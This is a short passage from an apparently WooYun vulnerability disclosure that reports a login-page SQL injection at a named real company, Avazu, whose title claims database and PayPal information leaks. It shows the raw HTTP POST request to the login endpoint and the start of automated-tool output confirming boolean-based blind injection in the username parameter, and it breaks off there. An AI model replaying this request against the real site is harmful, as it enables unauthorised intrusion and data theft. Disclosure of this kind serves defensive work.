code 区域 WooYun: Avazu艾维邑动敏感信息泄露漏洞打包(涉及数据库信息以及PayPal信息) 涉及数据库信息以及PayPal信息 登陆处注射 POST /application/mdsp_login.php HTTP/1.1 Content-Length: 154 Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Referer: http://avazuinc.com/ Cookie: w_language=en; wordpress_test_cookie=WP+Cookie+check Host: avazuinc.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.0 Safari/537.36 Accept: */* password=123456&username=wooyun 漏洞证明: code 区域 --- Parameter: username (POST) Type: boolean-based blind Title: OR boolean-based blind […]